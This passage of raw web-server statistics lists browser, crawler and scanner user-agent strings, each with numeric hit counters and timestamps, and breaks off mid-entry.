AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.97 Safari/537.36 4 0 0 0 1 0 0 29382042 0 0 29382042 0 Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/) 4 0 0 0 14 0 0 29401374 0 0 29249610 0 Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0 4 0 0 0 14 0 0 29334016 0 0 28641608 0 Mozilla/5.0 zgrab/0.x 4 0 0 0 3 0 0 29358846 0 0 29345841 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15 4 0 0 0 3 0 0 28817164 0 0 28641364 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36 4 0 0 0 2 0 0 29103520 0 0 28839572 0 Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko 4 0 0 0 1 0 0 29146197 0 0 29146197 0 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0 4 0 0 0 1 0 0 29071308 0 0 29071308 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0 4 0 0 0 4 0 0 28903974 0 0 28780326 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 4 0 0 0 2 0 0 29177642 0 0 29177642 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 4 0 0 0 2 0 0 29288348 0 0 29285448 0 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.183 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 4 0 0 0 6 0 0 29273209 0 0 29037586 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 4 0 0 0 3 0 0 29406460 0 0 28930740 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 4 0 0 0 3 0 0 29238523 0 0 29010612 0 python-requests/2.27.1 4 0 0 0 2 0 0 28826769 0 0 28826769 0 Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection) 4 0 0 0 13 0 0 28684693 0 0 28641453 0 Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0 4 0 0 0 1 0 0 28641887 0 0 28641887 0 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian 4 0 0 0 1 0 0 29157938 0 0 29157938 0 Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0 4 0 0 0 1 0 0 28855125 0 0 28855125 0 RepoLookoutBot/v1.1.0-312-gb56706a (abuse reports to abuse@repo-lookout.org) 4 2 2 0 9 28641362 0 29364908 28641362 0 28729323 3055 Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3 4 0 0 0 1 0 0 29154967 0 0 29154967 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre 4 0 0 0 1 0 0 29347242 0 0 29347242 0 Mozilla/5.0 (Android 14; Mobile; rv:123.0) Gecko/123.0 Firefox/123 4 0 0 0 2 0 0 29360585 0 0 29357594 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29173694 0 0 29173694 0 Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1 4 0 0 0 1 0 0 29384862 0 0 29384862 0 Mozilla/5.0 (Linux; U; Android 13; sk-sk; Xiaomi 11T Pro Build/TKQ1.220829.002) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/112.0.5615.136 Mobile Safari/537.36 XiaoMi/MiuiBrowser/14.4.0-g 4 0 0 0 13 0 0 28897948 0 0 28739571 0 Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36 4 0 0 0 1 0 0 29254325 0 0 29254325 0 Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29394053 0 0 29394053 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 4 0 0 0 6 0 0 28805728 0 0 28803786 0 ArcMobile2/1.33.1 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 1 0 0 29015635 0 0 29015635 0 Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko 4 0 0 0 1 0 0 29176049 0 0 29176049 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0 4 0 0 0 9 0 0 29372537 0 0 28861112 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 4 0 0 0 2 0 0 29406460 0 0 28822747 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 4 0 0 0 1 0 0 28741111 0 0 28741111 0 Mozilla/5.0 (Windows NT 6.1; Win64; rv:68.0) Gecko/20100101 Firefox/68.0 4 0 0 0 2 0 0 29371908 0 0 29360579 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 4 0 0 0 1 0 0 29081603 0 0 29081603 0 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/8fc5950 warc/v0.8.76 4 0 0 0 8 0 0 29357047 0 0 29061762 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29302618 0 0 29302618 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0 4 16 0 0 0 29346542 0 0 28641361 0 0 1024 Cpanel-HTTP-Client/1.0 4 0 0 0 1 0 0 29099990 0 0 29099990 0 googlebot 4 0 0 0 1 0 0 29352116 0 0 29352116 0 Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 4 0 0 0 5 0 0 29364331 0 0 29364331 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28905208 0 0 28905208 0 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/7597a01 warc/v0.8.54 4 0 0 0 1 0 0 29201596 0 0 29201596 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 4 0 0 0 1 0 0 28736926 0 0 28736926 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.88 Safari/537.36 Vivaldi/2.4.1488.36 4 0 0 0 2 0 0 28905253 0 0 28905253 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 4 0 0 0 2 0 0 28901598 0 0 28901598 0 Mozilla/5.0 (compatible; wpbot/1.2; +https://forms.gle/ajBaxygz9jSR8p8G9) 4 0 0 0 2 0 0 28643418 0 0 28641896 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29142716 0 0 29142716 0 Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 4 0 0 0 4 0 0 29250910 0 0 29250910 0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) 4 0 0 0 1 0 0 28642282 0 0 28642282 0 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 4 0 0 0 2 0 0 28740820 0 0 28740820 0 ArcMobile2/1.26.1 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 10 0 0 29159383 0 0 28936062 0 curl/7.88.1 4 0 0 0 1 0 0 29099290 0 0 29099290 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5 4 0 0 0 6 0 0 29346877 0 0 29159197 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 4 0 0 0 14 0 0 28896702 0 0 28846845 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 4 0 0 0 4 0 0 28802956 0 0 28802832 0 ArcMobile2/1.32.0 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 2 0 0 29236659 0 0 28839571 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 4 0 0 0 1 0 0 28641946 0 0 28641946 0 Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025 4 0 0 0 1 0 0 28741111 0 0 28741111 0 msnbot/0.11 ( http://search.msn.com/msnbot.htm) 4 0 0 0 1 0 0 28819195 0 0 28819195 0 Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 920) like Geckoo 4 0 0 0 3 0 0 28697867 0 0 28697867 0 Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) 4 0 0 0 1 0 0 29352604 0 0 29352604 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 4 0 0 0 18 0 0 29358881 0 0 28987038 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 4 0 0 0 2 0 0 29406460 0 0 28839571 0 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 4 0 0 0 1 0 0 28645222 0 0 28645222 0 Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 4 0 0 0 65 0 0 29287581 0 0 29287581 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) Gecko/20052505 Firefox/23.0 4 0 0 0 2 0 0 29233680 0 0 28663132 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 4 1 1 0 3 28696002 0 28696002 28696002 0 28696002 772 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15 4 0 0 0 1 0 0 29007444 0 0 29007444 0 Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 4 0 0 0 1 0 0 29361666 0 0 29361666 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 4 0 0 0 42 0 0 28789733 0 0 28778858 0 ArcMobile2/1.30.0 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 38 0 0 28771976 0 0 28769048 0 ArcMobile2/1.29.0 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 1 0 0 29302618 0 0 29302618 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 4 0 0 0 8 0 0 29372534 0 0 29372534 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29343503 0 0 29343503 0 Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 4 0 0 0 5 0 0 29364332 0 0 29364332 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.5.8 Chrome/120.0.6099.283 Electron/28.2.3 Safari/537.36 4 0 0 0 6 0 0 29354343 0 0 28641364 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 4 0 0 0 208 0 0 29382376 0 0 29285998 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 4 0 0 0 27 0 0 29244227 0 0 28790107 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 4 0 0 0 1 0 0 28823486 0 0 28823486 0 Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 4 0 0 0 3 0 0 28953355 0 0 28649630 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 4 0 0 0 60 0 0 28733179 0 0 28730032 0 ArcMobile2/1.25.0 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 1 0 0 29304690 0 0 29304690 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 4 0 0 0 5 0 0 29358297 0 0 29358297 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 4 0 0 0 9 0 0 29229795 0 0 29178132 0 Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0 4 0 0 0 1 0 0 29363932 0 0 29363932 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29152988 0 0 29152988 0 Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4 4 0 0 0 1 0 0 28770937 0 0 28770937 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 4 0 0 0 62 0 0 29228317 0 0 29001894 0 Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 4 0 0 0 2 0 0 29406460 0 0 29236604 0 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) 4 0 0 0 19 0 0 29371630 0 0 28665625 0 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) 4 0 0 0 41 0 0 29364908 0 0 28641362 0 Mozilla/5.0 (l9scan/2.0.5313e2731323e27383e2439313; +https://leakix.net) 4 0 0 0 1 0 0 29360485 0 0 29360485 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 4 0 0 0 1 0 0 29099992 0 0 29099992 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29140806 0 0 29140806 0 python-requests/2.25.1 4 0 0 0 2 0 0 29400328 0 0 29303721 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29202200 0 0 29202200 0 Mozilla/5.0 (Linux; Android 7.0; SM-J327T1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 4 0 0 0 1 0 0 29118674 0 0 29118674 0 Mozilla/5.0 (Linux; Android 9; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 0 0 0 2 0 0 29350466 0 0 29345841 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 4 0 0 0 10 0 0 28859782 0 0 28687280 0 Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9) 4 0 0 0 2 0 0 28641542 0 0 28641542 0 Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 4 0 0 0 5 0 0 29350815 0 0 29249482 0 python-requests/2.32.4 4 0 0 0 51 0 0 29330527 0 0 28825199 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 4 0 0 0 1 0 0 29299965 0 0 29299965 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0 4 0 0 0 6 0 0 29128071 0 0 29019479 0 python-requests/2.32.3 4 2 0 2 20 28695144 28695144 28705360 28695144 28695144 28642473 8470 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 4 0 0 0 2 0 0 29406403 0 0 29399697 0 cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29305397 0 0 29305397 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29285866 0 0 29285866 0 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 4 0 0 0 1 0 0 29259042 0 0 29259042 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 4 0 0 0 6 0 0 28730052 0 0 28642266 0 Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 4 0 0 0 13 0 0 29330824 0 0 29284784 0 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 4 0 0 0 1 0 0 29308779 0 0 29308779 0 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 4 0 0 0 1 0 0 29302226 0 0 29302226 0 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 4 0 0 0 7 0 0 29019479 0 0 29019479 0 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 4 0 0 0 1 0 0 29164005 0 0 29164005 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0 4 0 0 0 444 0 0 29268042 0 0 28993219 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 4 0 0 0 2 0 0 28729324 0 0 28641363 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 4 0 0 0 2 0 0 28642710 0 0 28642710 0 Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36 4 0 0 0 1 0 0 29180853 0 0 29180853 0 Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36 4 0 0 0 1 0 0 29373476 0 0 29373476 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29353656 0 0 29353656 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 YaBrowser/25.8.0.0 Safari/537.36 4 0 0 0 92 0 0 29099108 0 0 28907419 0 Mozilla/5.0 (compatible) 4 0 0 0 1 0 0 29394053 0 0 29394053 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36 4 0 0 0 1 0 0 28930772 0 0 28930772 0 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 4 0 0 0 1 0 0 28687824 0 0 28687824 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 4 0 0 0 24 0 0 28770144 0 0 28739840 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 4 0 0 0 2 0 0 28993882 0 0 28993875 0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 4 0 0 0 1 0 0 28643072 0 0 28643072 0 Mozilla/5.0 (Linux; Android 7.1.2; Nexus 6P Build/N2G48C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36 4 0 0 0 1 0 0 28979318 0 0 28979318 0 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36 4 0 0 0 2 0 0 29098866 0 0 29098866 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 4 0 0 0 272 0 0 29356484 0 0 29356483 0 Mozilla/5.0 (Windows NT 6.3; Win64; x64) Gecko/20092306 Firefox/22.0 4 0 0 0 65 0 0 29289461 0 0 29289460 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_4) Gecko/20072909 Firefox/15.0 4 0 0 0 1 0 0 29352439 0 0 29352439 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203 4 0 0 0 4 0 0 29239895 0 0 29239895 0 ArcMobile2/1.43.0 (iPhone; iOS 26.0; Scale/3.00) 4 0 0 0 1 0 0 29397163 0 0 29397163 0 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0 4 0 0 0 18 0 0 29362869 0 0 29110573 0 Mozilla/5.0 4 0 0 0 2 0 0 29171395 0 0 29171395 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 4 0 0 0 1 0 0 29182403 0 0 29182403 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 4 0 0 0 16 0 0 29377835 0 0 28907981 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 4 0 0 0 1 0 0 28738733 0 0 28738733 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 4 0 0 0 1 0 0 28737541 0 0 28737541 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15 4 0 0 0 6 0 0 29357583 0 0 29154022 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 4 0 0 0 7 0 0 29034500 0 0 28939043 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 4 0 0 0 1 0 0 29015618 0 0 29015618 0 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 4 0 0 0 1 0 0 29236604 0 0 29236604 0 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) 4 0 0 0 1 0 0 28720443 0 0 28720443 0 Opera/9.20 (Macintosh; Intel Mac OS X; U; en) 4 0 0 0 1 0 0 29269794 0 0 29269794 0 Facebot 4 0 0 0 8 0 0 28770144 0 0 28739839 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 4 0 0 0 4 0 0 28822637 0 0 28822637 0 ArcMobile2/1.34.1 (iPhone; iOS 18.0; Scale/3.00) 4 0 0 0 1 0 0 28713202 0 0 28713202 0 Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 4 0 0 0 1 0 0 29328742 0 0 29328742 0 Mozilla/5.0 (iPad; CPU OS 18_5_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/138.0.7204.156 Mobile/15E148 Safari/604.1 4 0 0 0 16 0 0 29146055 0 0 28859116 0 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 4 0 0 0 1 0 0 29355885 0 0 29355885 0 Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T530NU Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Chrome/38.0.2125.102 Safari/537.36 4 0 0 0 93 0 0 28770918 0 0 28770884 0 python-requests/2.31.0 4 0 0 0 6 0 0 29361167 0 0 29353631 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29302226 0 0 29302226 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0 4 0 0 0 3 0 0 29363938 0 0 29191396 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 4 0 0 0 3 0 0 28759680 0 0 28759615 0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 4 0 0 0 7 0 0 29408689 0 0 29264639 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36 4 0 0 0 8 0 0 29358298 0 0 29354786 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.96 Safari/537.36 4 0 0 0 2 0 0 28729910 0 0 28729910 0 Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36 4 0 0 0 1 0 0 28663132 0 0 28663132 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 4 0 0 0 1 0 0 29366495 0 0 29366495 0 Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 4 0 0 0 1 0 0 29320034 0 0 29320034 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 